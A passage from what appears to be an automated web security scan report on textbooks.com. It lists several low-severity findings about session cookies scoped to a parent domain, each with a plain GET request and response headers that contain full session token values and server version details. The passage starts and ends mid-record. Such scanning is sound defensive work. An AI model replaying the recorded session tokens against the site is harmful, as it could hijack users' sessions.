bGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=RtCUsbWXaFR47MNWPWHOzPcmR78poiHZjG7hDxh7QODVdNiT0%2FgnZ98hCqLh7wT9sDekHYtZF%2BwOIfrndsIMeQSDgDPcWbJF9puHQxEa6%2BitYnwan4YS%2FvP7UzwbH%2B2tMpGeGyOmWGv6%2BEOj8vihwI2MrJKUAULzP03b2fAeY7mTFQRQO1meIcgqIwr4x81VQwUR6Peqv6A%2FmYHiBf4HV3PFOZB%2BBiEKNLSRYdiRikFZB0Qjz58nLotkTytGq5lMmcHSx2D9n%2BlTV4Yi%2BQVQzsxLPIGEPrf7AdYh%2BDzuqpLg%2BnpWAXkJVSoQ0tnhvMmqVdnc8O0J%2BMEjDIyUriloigVUhNoty2m7L8tZMQykQRMxxifyi7VH4vM%2FEN4QUSvZpizcCfGKZQQRQwdyTQ19QVxz1p%2BV7U4%2FFn18CiISYeoJYlkJ93KaU88UkUEdKfVMVsf8jSpalZsEqCnX8MjAInoflORDE2NfnghY%2BMVz0tyRmaYXXo6CzRW20AnegvjjrXYCZfpFx2OJPzn4ct7MyUCh3gPOi2wdOcGjkG3OboZdX28ux7lIg0dTOu%2BAI3B28DUHw11eZ1cWfPelg3dHyaoetrpvnMbPI7gADHXiX909SEJY3oR0%2FQi6NZN9uaE51a5Ejjl5NZnfGZLEl7JeO7NTV%2F24Pqd%2BGbBjI8okC9xle6OnRbj0nolHzBgnJIvcj8m2TWNU9h87d6M%2FGdKDYi2i0KCpw9%2BBioCIasHoqfhJAzaUgZ2r8Uj2PIEMtGWNs5nZkPlHMvOxd0ObSZTJLyMW0M8IHUVoYLq%2FYWFeUP9VBnR0uTlqS5Feil%2B%2F2gieTTgQHSaCwK8IAWSTWr8uF5wGxJM%2FI3zruPwXAGf3Lkghr3ZwHI6Mlk%2BrQ4wMTicYC%2FYpFYaEztQf5bkaDbb0Xb5voEGInwWxmyt10dmD33Ngdapiq6h0VqcltGHBsCHOI9XgQ1DCBBqoOC64FfPQWBwheQkuY104mXfwXjwBh7Z75ifIj%2F9Dexa9lxyQDa6A%2BnrkNUhIFg1btmhOVziLgsDmmQOfPtYffSDnBpvGQGQBAmW2RgNKLkXXoJcVPburDXBmkxZNRHmwLKqH5k8DWhbfwgv6gDdOOBebqdbfwkGL02KMNXS8TDFMF6bzCnMfCqHaVeMlABDRdfCUzfeEMT8N%2BIHq77PK7fTKrHzsBx1JnjId9FT3NOmVy3UC%2FQfHBZvFFPmpiBP6VvfUDXLDuD%2BTWMXwseiTH4DuYDXrcgD15pGocCqojnb%2F0z4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=qg3kYe9q6PN%2FD6c8q%2FY%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 126483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.10. http://www.textbooks.com/Catalog/E/Education.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/E/Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BQT15syJFQpHp4dFG2eEpo5qhhxrN2NnXXojj%2B6vsjDlYwicebgGKOemaZwFuSpLGvERyDHJVrsOrpxCJqN516%2BVeigWN4CS52D%2ByFKeR9WqZXy2L93y1y0TTO%2FL02RMH3uE%2BkLM%2BDcTNSUgBGZyH95BMfWeoAzQs84E%2FN7tGPt7Fo0%2FhGQXKH0Q4G6Cwsv%2FNG7Ob7nyAy35Uay7WCIeTwknULTbN%2FHUrk0hmZi4EPkDKYy2miATcF2at%2FEsSO%2Fh1aVHxX2bKd5JenPNus0Tz0rHunwBvQRiIvOgX7KZdX%2BHieokPD%2BoevYGCabIOYnf47QzxWcbpCDnFVy%2BsRuNSNs3mMqT7k874RW0eZjFlmWEhBugfSwAR4nkFAXDQRZNqh8j9pZRXUOQCkFmQlEYrtJvrHZn0zj3uD9xH3sYcfy%2BSWUA%2FuGBxR9sNfqptweYYHDl4BY%2FVFhp97YXQ8Droky5fLCjVzc9xQrg82zPbc4tFVr1dLHFnDWamU6K1S0SrMwg%2FxYhK6Sx9yFUWsJRaFoj3Qn%2F80uOExnjGTTjcTd5qeqIdtxeTXDrc4PW7jrbB1%2BQf2Wpl8ja6dfhfhivhkSzKz5N55%2FOhwjl%2F7YXkfLIXv7QPZaDNaq3SASKNJBu1xaXoSdAp9zM%2B8WmxFGTHyb7BpSbx5gMxFsiMkQV%2FL5Le3M%2FaafjDNA8PJq7Z99F6Zw%2BnpQcZhZQoEarCEvnS9ZfOWQAxvEQ4RweR3i89Bba0LaEFdXa5WCAIuVwBg4mfSyjTfZQt1tIGM1q9m7ysaQqTNXIvivO4J1ILWGGHSgR5b34W20AWIBqC0%2B896S7nEXQzjMQA%2BEXtjQEO7k0UHW7YgbhQ345%2BIQilKuOxIJ9ifPgdJ2RpatlyzzW0x2CpA5BDE20evC4XQ1eO8uzlhKeXahsVWmYCDdp8mHm4Bb0hIMR5NSuZ7hD141zoqZ9fybUepYslfVHvcBsV%2F%2BEKepgQk3TpdEK4n26hoYBrZhR%2FpQ5GT3zgqiLdc5hldzuMLsT4%2Fmo9k%2BNZwqUZxXImfhbYAeIxadx0stzmiEdhIk9NRByVIv%2Bo%2B3zRlm5GS8DnsafkElC00Kyts9uRmQJjcwB8ELdqqD8jOy33w%2Fix6Spz%2FA5y2ziEUpkiomtan%2ByRTsRv7Cuz3Plqgqc%2FSIupUZ33THHanyIBH7T9%2FkPdgiTn1xA7gaYMSFCFIBgz%2Bim29x9J6B9UikJiji9arLw8%2F2p2jlGL0iFJUNVpZBaKDSXyul5fL8M9wruriM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=VAA7TauIvNb3MpIV8EI%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 151328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/G/History-and-Geography.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=u4V8YIRyYL1qO4cc8fpVBN8aXViG6zrMpu4wwzHQO52nr75S18JR3wKQDG%2F6HdqSbW4QUkr6KiMnTT4MmbRKlUQSFjq6uU3fuHi%2F%2F%2B1nt5MYKWVtEeGH8W2wV4XngH%2Ff4lGCyucp6LeVoYeLEofcQA8ORsuJ4%2BZlAMCevKHfwXSIBMuwcAG1G6rc8mX5srtdVcxAbu2Pvhoy%2BAr0sCOSeF5KF5Q54NDD66XMH7Y3YkmzCl4frseROWYqKlQIgkD1kJpaSayC2LcLtT1lZNhwIx%2FuaGnlhmC0s5sdvU66mrNOgAb50i9UDyDhtKUpqZxrF6oFkYLy1HiWoFx%2FhIrHwtR4WPgJFjC6UhOli9xNtmX3A6oqHGg%2FOuQv8USiVnjCgMTH3DgWXMUxjk1Ey9VgyIVJIMXQszvslZZ8c270r1Adqb%2FAtxDq0A6wHTf8n3PDxyOm1m%2BjbwSIIvfqAk3mSwHKKmRUxaRBpHr81XujCMTywdm9dCPL%2F0dEIKvQI0WJqDyAaglAAlbrthQfdIy9XKLroe9up673OqxDIgzlk7s5sKttSe8TH6zVmVU7UqU7hDeCBxUuLdxI9vXbqVZc2Fi7UMGO37sYeDZOxZdn4k%2Bt04W%2FN2XAskn%2Fnvw7m1ad6DDJ9H8%2FCZYIkykJNGBhg6dwezBCGDofHtcbcF3Ehqb1EIH5Y628zbdHjQAIzsWfKVg8910UAqVKx3FAQ1HxBGWu1p6fbO8ndZFdZBB%2FxRaJP6EdY0l48AOFB%2FgoZWmBej9U%2FYUL1lgF7B87JI%2FUO9%2F2Ri1ZAB9ENerR9zTLfGx7plZOUxM9cY5r96eYdqckWAi5inVnfyr9OAHoqvbEBrSg76ev9bg3bd7eELRwL9ZvrBxDrW9XKM41kzvvWzTLnlaIuMGgRT4gHTAl0h0dgylxaCwTzgdD0vIkDr9man%2FDvb1ehOIWMlhIGIz3MGb8WpYNNAMTX4r3MUO7AVfRzCL4haFO8M2ZdTDrz7Quii7Jf1h2irNSWvMSKj71pA7kVeQV%2FgAHLKsO%2B89PsBn4WC80sJWEsYVbn32qVgmh%2BoG%2BGf1FfTXkQ2lsUO%2FRGds6G0xpXtg54cIBUT8hiw0h26dhQnukxU0GOD2Z%2F%2BPiEf9SB2m3qjcN31ldmJlWTRqbHmSPvLZ9HTaJoqXCEw3FV7lXDFn5bX9SALvMeadgshk27xxwvii2z3PQDJYqIkD1RqBGOLY14ZLiE6Y2ga4ySSogX9FhoPWy9b90UQ%2FIyhoi6SzJZ7hjRqilfBU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=2BZ3dFHzZbVUm9u%2FkwQ%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 140644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/H/Arts-and-Humanities.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=6V6EGlHQRxeAYbzR8BD2Ib8Qdgrfw3njQmVZvpDHAaePV5%2FK6uG%2FoYHwgrYH0NbA9YRZXSWe55LoQiGKWi6KqREPPF5DwHlcNi0m8TGz7jleQcL1fsofYmMDSkhAFxwpaU9BcRoL9Jk1AVRjFpDF8%2FoOMwuoSxLWC%2FwknQLEuqHx3PvBbhFhGpgCqJWIe0Wr258LN%2BtKQtawmWP9xBvwGVYxaTTa3EzQMFIAwUZWhtpdV12HX0olp4YHSbETuruOWeL8f2HaAAFn1wKokujAsqh103pve0%2BqC44alxL549tkMvLkemBBX9XXudTrpZ3FidTlw8BdPh1HXyDBT6%2FhdF5uObdhNuxLVgHtP5WjjJVbCaGLR%2FVJeYRqG3hpEpeeJZN72hde4v1qVSht5U6MW6FpgoA22Usf1TIRfeAtlbdPEmXvshzsrybaMPdk70JZCQRC6Hp%2FgegUvLoDUmbgLWLzHX5XFcWOjK1w8qGasIh54wf3tC9iZ1YOvLGNCbdIIrjbj3hZeVB3pExWYPLkLnnbmMQixT9VbfrmiJuzUZyi7saFXFOQDx8fLGlMJecKi55%2BNv5IFXAP5XcHu%2FKFOYEpFB%2Ft0bIbAVb3mtdsuqESLdRFJRKpXxJ72pnceOt0koeUeG%2B0xchjjdc0WU894eTtzhi1GltfGgx7xa5W9McPSyLRnxsV0UeOiwdphcZfQXOV19efAzNtwZNeW%2FMm3T1GS64zIf403O%2FhgJ306hHrFKOmPd%2F5rS3fsbHJBTc6ViWCckTG04YXCuKqMBoANsW5FGN8u%2BjPUXRZiZ%2B92Mv61N7KDqOzYec6w0W4UvTwLoYPZ%2FQZYwQ5Jb9FPAZG4wvonVHgzXUsjsxWbZc4mS7IDQsSoEBp2UqOCs1nTNuYMKwctmQHCCqThti8nZWzFlXhOnZo8v7BDfAo%2BSRo1SO6fYDMZhCqgp0zgVIAFKIVwnc6nstSFDJt7DexP6XBQHJ9jU6FUEIxzFRzm3bEBU4rBtGhdCDB1oT2zzP%2BZ0uWl5N5GmBsUqfBo2Plmoj9i%2Bg2%2FlBXFffXn55MOhLfr9APP2MfUIVDuQeTOz6KBcJbFaF2lWoiqaRPyIddpxu1mRwQbrZrQHxeyz3gx%2Fn%2FksVaubH%2Bpb9K0JfRxlFSK%2B0XCeLVMY3lF8VhhTPNzCC0hKkOqb3Mm3umEziRmXy%2FkHgx%2BRFEpbjbaDZy16xInpJlSgQymNz5Ig64Z6J%2BMmyqciEwyrCt61VtFRAqXto3MGZ7tsHD0FW1aZnZIyQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=DCFkgYROO8MBmmRupNk%3D; expires=Mon, 26-Dec-2011 13:52:02 GMT; path=/; domain=.textbooks.com
Content-Length: 107266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/HQL/General-Video-Titles.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
